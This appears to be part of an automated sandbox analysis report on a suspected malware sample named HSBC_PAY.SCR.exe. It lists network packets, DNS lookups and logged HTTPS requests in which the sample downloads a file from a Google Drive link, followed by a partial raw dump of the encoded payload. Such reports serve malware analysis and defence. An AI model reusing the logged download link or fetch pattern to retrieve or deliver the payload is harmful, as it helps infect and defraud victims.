                                                                  Jan 3, 2025 20:02:01.161941051 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.161978006 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.161983013 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.162070990 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.162112951 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.162117958 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.165857077 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.165889978 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.165903091 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.165908098 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.165939093 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.165945053 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.165956020 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.165996075 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.166007996 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.166213989 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.166249037 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.166254044 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.166337013 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.166373014 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.166378021 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.166506052 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.166534901 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.166543007 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.166627884 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.166657925 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.166666031 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.166670084 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.166701078 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.166706085 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.167011023 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.167037964 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.167043924 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.167048931 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.167092085 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.167098045 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.167176962 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.167210102 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.167217016 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.167221069 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.167259932 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.167264938 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.175616026 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.175651073 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.175664902 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.175668955 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.175714016 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.175725937 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.175735950 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.175770044 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.175820112 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.175991058 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.176016092 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.176031113 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.176037073 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.176084995 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.176089048 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.176187992 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.176224947 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.176230907 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.177251101 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.177295923 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.177300930 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.177381992 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.177417994 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.177423000 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.177506924 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.177542925 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.177547932 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.178256989 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.178287029 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.178292990 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.178297997 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.178334951 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.178397894 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.178478003 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.178513050 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.178518057 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.182235003 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.182271004 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.182276011 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.182337999 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.182363987 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.182369947 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.182374954 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.182410955 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.182434082 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.183178902 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.183216095 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.183219910 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.183299065 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.183330059 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.183335066 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.183437109 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.183470964 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.183475018 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.186934948 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.186980009 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.186985970 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.187056065 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.187077999 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.187088966 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.187093973 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.187129974 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.187135935 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.197098970 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.197160006 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.197165012 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.197170019 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.197206974 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.197211981 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.247556925 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.247597933 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.247616053 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.247626066 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.247653961 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.247663975 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.247668028 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.247706890 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.247708082 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.247715950 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.247761965 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.247767925 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.247796059 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.247832060 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.247837067 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.247989893 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.248040915 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.248301029 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.248322964 CET44349732142.250.185.129192.168.2.4
                                                                  Jan 3, 2025 20:02:01.248333931 CET49732443192.168.2.4142.250.185.129
                                                                  Jan 3, 2025 20:02:01.248339891 CET44349732142.250.185.129192.168.2.4

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 3, 2025 20:01:55.964399099 CET6060353192.168.2.41.1.1.1
                                                                  Jan 3, 2025 20:01:55.971420050 CET53606031.1.1.1192.168.2.4
                                                                  Jan 3, 2025 20:01:57.032021999 CET5402853192.168.2.41.1.1.1
                                                                  Jan 3, 2025 20:01:57.038842916 CET53540281.1.1.1192.168.2.4

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jan 3, 2025 20:01:55.964399099 CET192.168.2.41.1.1.10x2278Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                  Jan 3, 2025 20:01:57.032021999 CET192.168.2.41.1.1.10xcc65Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jan 3, 2025 20:01:55.971420050 CET1.1.1.1192.168.2.40x2278No error (0)drive.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                  Jan 3, 2025 20:01:57.038842916 CET1.1.1.1192.168.2.40xcc65No error (0)drive.usercontent.google.com142.250.185.129A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • drive.google.com
                                                                  • drive.usercontent.google.com

                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449731142.250.184.2384436808C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-03 19:01:56 UTC205OUTGET /uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8 HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: drive.google.com
                                                                  2025-01-03 19:01:57 UTC1319INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 03 Jan 2025 19:01:56 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-Iktmtqq6jyBGhG6ZXYlh0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449732142.250.185.1294436808C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-03 19:01:57 UTC223OUTGET /download?id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8&export=download HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: drive.usercontent.google.com
                                                                  2025-01-03 19:02:00 UTC4939INHTTP/1.1 200 OK
                                                                  X-GUploader-UploadID: AFiumC4WwvBYc9wyPWTj-CwgAx6VAY9OnEjXJOwfG1lhO9I1spqGq8Xb0UQEpTTDRhnWqDkkCuskiuY
                                                                  Content-Type: application/octet-stream
                                                                  Content-Security-Policy: sandbox
                                                                  Content-Security-Policy: default-src 'none'
                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                  X-Content-Security-Policy: sandbox
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                  Cross-Origin-Resource-Policy: same-site
                                                                  X-Content-Type-Options: nosniff
                                                                  Content-Disposition: attachment; filename="233_Ktnfnozurgp"
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Credentials: false
                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 820568
                                                                  Last-Modified: Wed, 01 Jan 2025 08:19:34 GMT
                                                                  Date: Fri, 03 Jan 2025 19:02:00 GMT
                                                                  Expires: Fri, 03 Jan 2025 19:02:00 GMT
                                                                  Cache-Control: private, max-age=0
                                                                  X-Goog-Hash: crc32c=QiEjaw==
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2025-01-03 19:02:00 UTC4939INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 67 46 78 30 67 46 42 45 53 48 68 49 5a 48 41 34 53 4a 41 38 61 44 69 63 57 46 42 38 57 44 78 51 51 49 68 34 4f 45 52 63 58 4a 52 38 52 47 42 34 53 48 52 63 58 45 77 34 68 47 68 45 58 44 68 6b 4f 4a 52 59 64 48 69 49 52 46 78 49 6a 48 52 51 63 48 52 49 6b 44 68 63 52 48 36 61 75 70 56 6b 6a 70 37 46 4c 56 69 45 62 45 78 73 63 4a 79 49 66 46 42 32 6d 72 71 56 5a 49 36 65 78 53 38 66 4f 78 4d 66 62 32 4e 6e 46 32 64 44 54 31 64 6e 4c 31 74 48 56 76 73 33 62 78 73 33 57 32 39 66 4a 78 64 58 59 7a 73 36 38 78 74 6a 50 78 64 6e 45 7a 73 37 61 31 63 6a 52 32 4d 37 56 30 4e 57 38 7a 63 54 46 79 64 6a 4f 32 63 72 45 32 39 50 45 32 63 76 56 7a 74 6a 47 78 38 37 45 78 39 76 59 32 63 58 5a 30 4e 50 56 32 63 76 57 30 64 57 2b 7a 64 76
                                                                  Data Ascii: pq6lWSOnsUsgFx0gFBESHhIZHA4SJA8aDicWFB8WDxQQIh4OERcXJR8RGB4SHRcXEw4hGhEXDhkOJRYdHiIRFxIjHRQcHRIkDhcRH6aupVkjp7FLViEbExscJyIfFB2mrqVZI6exS8fOxMfb2NnF2dDT1dnL1tHVvs3bxs3W29fJxdXYzs68xtjPxdnEzs7a1cjR2M7V0NW8zcTFydjO2crE29PE2cvVztjGx87Ex9vY2cXZ0NPV2cvW0dW+zdv
                                                                  2025-01-03 19:02:00 UTC4821INData Raw: 78 57 35 39 7a 38 61 49 6b 4e 43 71 59 6f 65 73 48 52 63 42 42 42 73 64 54 43 64 33 54 31 7a 73 6f 37 7a 63 57 4a 62 58 54 48 78 57 77 75 45 78 30 79 4a 55 70 54 61 41 61 61 31 63 58 6e 41 70 4a 69 66 55 4d 46 6d 6a 75 70 62 64 37 38 58 7a 64 6b 6a 65 73 46 57 38 77 46 2f 64 4b 2b 41 50 54 43 43 32 56 68 32 54 63 66 71 33 45 42 71 49 67 47 39 77 65 33 6a 41 34 4d 76 72 72 52 65 7a 4c 43 50 59 4e 33 79 35 4e 5a 7a 2b 6f 52 66 74 6b 4f 30 4d 35 69 6b 79 6a 44 45 76 74 36 6d 48 34 43 66 34 45 79 59 77 56 4b 78 69 35 6b 4e 75 49 73 7a 4e 71 68 74 36 35 6d 34 37 72 32 72 34 4c 62 47 62 30 71 6e 6d 42 59 57 6c 76 4f 7a 6b 58 38 69 6a 72 7a 6c 44 31 46 74 6a 65 69 5a 79 79 50 77 67 30 69 50 6c 43 6f 4e 7a 35 6f 64 42 48 6b 67 5a 48 47 4a 30 43 39 4c 56 46 4c 52
                                                                  Data Ascii: xW59z8aIkNCqYoesHRcBBBsdTCd3T1zso7zcWJbXTHxWwuEx0yJUpTaAaa1cXnApJifUMFmjupbd78XzdkjesFW8wF/dK+APTCC2Vh2Tcfq3EBqIgG9we3jA4MvrrRezLCPYN3y5NZz+oRftkO0M5ikyjDEvt6mH4Cf4EyYwVKxi5kNuIszNqht65m47r2r4LbGb0qnmBYWlvOzkX8ijrzlD1FtjeiZyyPwg0iPlCoNz5odBHkgZHGJ0C9LVFLR
                                                                  2025-01-03 19:02:00 UTC1321INData Raw: 38 52 6e 2f 41 61 57 68 56 69 6b 53 52 4e 74 76 68 43 6d 62 45 36 30 6e 57 38 75 45 2b 50 51 63 49 6a 41 6e 47 41 34 6f 56 4a 75 36 31 2f 72 6e 6c 6d 69 47 79 50 42 63 62 46 6f 32 77 55 36 75 73 48 50 62 46 6e 77 57 33 5a 58 6c 37 44 4d 68 7a 54 38 76 37 56 48 36 68 4b 49 47 52 79 74 6c 57 67 65 4b 34 52 57 45 33 4f 30 34 2f 36 74 54 2b 44 30 2b 49 39 50 41 46 78 61 52 6f 6d 51 4c 6f 4f 59 69 6f 44 4b 35 50 71 41 33 32 48 51 44 30 7a 53 63 51 36 61 41 35 47 37 47 43 43 7a 49 35 73 35 49 78 30 33 4d 76 56 66 51 4a 66 46 4e 5a 48 38 61 54 61 58 72 43 6d 36 63 34 2f 63 56 66 54 44 66 50 63 35 69 67 7a 6d 44 45 55 54 37 55 44 45 44 71 34 63 6e 5a 6b 53 6c 30 71 77 49 74 30 34 44 59 39 6c 72 46 6d 79 50 59 4c 4c 34 39 56 78 4a 46 43 68 74 6c 67 31 71 4f 54 50
                                                                  Data Ascii: 8Rn/AaWhVikSRNtvhCmbE60nW8uE+PQcIjAnGA4oVJu61/rnlmiGyPBcbFo2wU6usHPbFnwW3ZXl7DMhzT8v7VH6hKIGRytlWgeK4RWE3O04/6tT+D0+I9PAFxaRomQLoOYioDK5PqA32HQD0zScQ6aA5G7GCCzI5s5Ix03MvVfQJfFNZH8aTaXrCm6c4/cVfTDfPc5igzmDEUT7UDEDq4cnZkSl0qwIt04DY9lrFmyPYLL49VxJFChtlg1qOTP
                                                                  2025-01-03 19:02:00 UTC1390INData Raw: 6a 6e 34 76 6c 6d 5a 4d 76 4f 50 2f 58 6b 77 59 43 63 4d 6f 46 53 57 48 73 56 42 74 36 4a 37 4a 71 43 71 30 58 58 37 4d 53 54 58 42 32 49 57 30 52 32 67 65 42 2b 69 2b 73 45 6d 4a 41 67 35 35 32 44 62 71 41 36 52 75 75 6f 66 79 62 70 70 72 6e 41 59 2f 7a 33 51 33 52 62 76 31 58 59 71 4d 69 32 54 30 32 62 45 4f 6d 52 61 4e 6a 73 68 4c 41 6b 73 7a 70 41 51 4e 76 48 54 48 6d 68 55 32 37 57 6b 62 6f 50 51 54 6d 37 2b 65 79 6a 47 55 44 70 6a 33 4e 7a 69 38 61 4a 36 4e 37 37 31 2f 45 64 78 33 61 65 61 68 49 2b 4a 70 74 41 4b 4c 64 4d 38 58 6c 58 34 4d 36 62 73 65 65 57 46 41 45 43 6f 4a 71 33 54 4a 47 43 59 78 41 50 74 65 73 41 35 76 42 6c 4c 6a 45 6c 70 57 45 4b 73 78 58 4d 54 44 6d 6a 6f 6e 4b 6b 37 51 32 69 78 69 34 79 56 6c 39 66 30 6f 6d 64 5a 6e 75 50 66
                                                                  Data Ascii: jn4vlmZMvOP/XkwYCcMoFSWHsVBt6J7JqCq0XX7MSTXB2IW0R2geB+i+sEmJAg552DbqA6RuuofybpprnAY/z3Q3Rbv1XYqMi2T02bEOmRaNjshLAkszpAQNvHTHmhU27WkboPQTm7+eyjGUDpj3Nzi8aJ6N771/Edx3aeahI+JptAKLdM8XlX4M6bseeWFAECoJq3TJGCYxAPtesA5vBlLjElpWEKsxXMTDmjonKk7Q2ixi4yVl9f0omdZnuPf
                                                                  2025-01-03 19:02:00 UTC1390INData Raw: 4c 44 52 6d 30 7a 79 67 2f 39 71 7a 65 32 31 32 58 48 41 38 78 4d 47 46 41 5a 6a 77 6a 58 46 67 2f 6f 79 62 34 42 34 4e 7a 4b 5a 46 48 33 53 59 78 67 61 6c 6e 44 4e 48 56 72 59 53 53 62 77 4e 70 6e 69 78 54 68 74 35 38 68 36 2b 44 4e 78 66 4a 63 78 4e 78 2f 6d 42 59 7a 34 5a 56 76 71 32 34 75 45 2b 59 4d 41 6b 35 72 5a 53 71 50 35 74 59 50 4f 74 71 2b 39 41 34 66 35 57 42 52 69 6a 75 2b 6e 4b 61 44 6b 72 6a 6c 48 75 6f 4b 4e 31 37 32 54 39 39 63 6f 41 6f 69 33 6b 78 73 31 6f 31 42 76 65 32 6f 4d 56 30 7a 43 4b 44 38 64 63 61 65 76 53 79 32 43 6b 37 32 39 4e 45 49 48 62 5a 62 77 42 68 2b 34 62 53 4c 62 41 52 6d 4e 75 45 57 38 4d 78 63 50 59 48 63 54 4b 67 5a 4c 34 35 74 47 47 67 6f 33 78 44 7a 57 64 34 74 4e 4f 51 57 65 30 6d 42 31 4f 38 6b 46 39 2b 41 72
                                                                  Data Ascii: LDRm0zyg/9qze212XHA8xMGFAZjwjXFg/oyb4B4NzKZFH3SYxgalnDNHVrYSSbwNpnixTht58h6+DNxfJcxNx/mBYz4ZVvq24uE+YMAk5rZSqP5tYPOtq+9A4f5WBRiju+nKaDkrjlHuoKN172T99coAoi3kxs1o1Bve2oMV0zCKD8dcaevSy2Ck729NEIHbZbwBh+4bSLbARmNuEW8MxcPYHcTKgZL45tGGgo3xDzWd4tNOQWe0mB1O8kF9+Ar
                                                                  2025-01-03 19:02:00 UTC1390INData Raw: 48 36 42 44 2b 37 31 52 41 6e 32 68 33 72 47 6a 47 74 4c 4d 6c 44 4c 76 2b 42 50 39 34 58 31 61 31 71 33 77 70 68 53 32 57 45 43 56 48 6e 59 39 30 44 59 4f 56 32 43 72 55 64 39 50 71 51 47 37 73 58 36 2f 4d 4a 33 50 49 44 72 42 58 77 61 48 63 63 55 77 75 75 66 42 68 4f 4e 62 33 42 2f 4f 38 6a 73 6e 7a 76 56 4e 54 56 43 33 42 66 68 71 4f 31 4b 4c 63 44 38 4b 79 6b 35 5a 6d 4d 50 63 6b 4d 45 59 35 30 67 78 44 78 64 70 2f 34 47 79 47 41 32 65 4d 6a 38 32 47 49 35 4e 2f 68 68 35 4a 76 73 2f 6f 73 31 42 4a 4f 35 56 4f 69 5a 52 58 76 51 56 74 79 74 4d 32 5a 61 73 6b 46 73 56 4f 52 32 7a 39 50 4c 67 33 66 33 35 59 76 2f 79 50 4e 50 2f 4d 57 71 77 49 54 56 45 39 69 6a 54 5a 36 39 62 7a 35 68 37 53 74 53 66 39 68 52 6e 37 62 44 4d 4e 53 6b 67 51 58 46 49 42 2b 4e
                                                                  Data Ascii: H6BD+71RAn2h3rGjGtLMlDLv+BP94X1a1q3wphS2WECVHnY90DYOV2CrUd9PqQG7sX6/MJ3PIDrBXwaHccUwuufBhONb3B/O8jsnzvVNTVC3BfhqO1KLcD8Kyk5ZmMPckMEY50gxDxdp/4GyGA2eMj82GI5N/hh5Jvs/os1BJO5VOiZRXvQVtytM2ZaskFsVOR2z9PLg3f35Yv/yPNP/MWqwITVE9ijTZ69bz5h7StSf9hRn7bDMNSkgQXFIB+N
